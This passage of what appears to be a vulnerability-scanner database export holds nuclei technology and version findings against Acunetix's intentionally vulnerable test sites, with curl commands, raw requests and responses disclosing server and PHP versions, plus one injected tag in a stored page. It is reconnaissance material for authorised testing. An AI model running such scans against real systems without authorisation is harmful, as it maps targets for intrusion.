href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Sorry, but commenting is currently disabled! <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 164, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:34:48.795Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 Edg/89.0.774.45\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:45 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 165, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/nginx/nginx-version.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/nginx-version", + "template_id": "nginx-version", + "matcher_name": "", + "name": "Nginx version detect", + "severity": 0, + "description": "Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.", + "impact": null, + "remediation": null, + "extracted_results": "[\"nginx/1.19.0\"]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:34:48.879Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:45 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 5, + 10 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 166, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "dreamweaver", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0' 'http://testphp.vulnweb.com'", + "type": "http", + "http_url": "http://testphp.vulnweb.com", + "discovered_date": "2024-11-13T02:34:48.960Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:34:45 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"\n"http://www.w3.org/TR/html4/loose.dtd">\n<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">\n\n<!-- InstanceBeginEditable name="document_title_rgn" -->\n<title>Home of Acunetix Art</title>\n<!-- InstanceEndEditable -->\n<link rel="stylesheet" href="style.css" type="text/css">\n<!-- InstanceBeginEditable name="headers_rgn" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language="JavaScript" type="text/JavaScript">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id="mainLayer" style="position:absolute; width:700px; z-index:1">\n<div id="masthead"> \n <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> \n <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>\n <div id="globalNav"> \n \t<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>\n\t<td align="left">\n\t\t<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists\n\t\t</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | \n\t\t<a href="guestbook.php">guestbook</a> | \n\t\t<a href="AJAX/index.php">AJAX Demo</a>\n\t</td>\n\t<td align="right">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name="content_rgn" -->\n<div id="content">\n\t<h2 id="pageName">welcome to our page</h2>\n\t <div class="story">\n\t\t<h3>Test site for Acunetix WVS.</h3>\n\t </div>\n</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id="navBar"> \n <div id="search"> \n <form action="search.php?test=query" method="post"> \n <label>search art</label> \n <input name="searchFor" type="text" size="10"> \n <input name="goButton" type="submit" value="go"> \n </form> \n </div> \n <div id="sectionLinks"> \n <ul> \n <li><a href="categories.php">Browse categories</a></li> \n <li><a href="artists.php">Browse artists</a></li> \n <li><a href="cart.php">Your cart</a></li> \n <li><a href="login.php">Signup</a></li>\n\t <li><a href="userinfo.php">Your profile</a></li>\n\t <li><a href="guestbook.php">Our guestbook</a></li>\n\t\t<li><a href="AJAX/index.php">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class="relatedLinks"> \n <h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 167, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "font-awesome", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0' 'http://testhtml5.vulnweb.com/report'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/report", + "discovered_date": "2024-11-13T02:34:49.031Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /report HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:122.0) Gecko/20100101 Firefox/122.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Your report was submitted, thanks. <!-- invalid -->\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 168, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "font-awesome", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0' 'http://testhtml5.vulnweb.com/like'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/like", + "discovered_date": "2024-11-13T02:34:49.109Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /like HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:36 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Action</li>\n <li class="active"><a href="#/response">Response</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n \n Thank you very much for your feedback! <!-- invalid -->\n<link src='http://localhost/link'>\n \n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p>&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n<script src="/static/app/app.js"></script>\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 169, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:34:49.174Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:34:37 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" 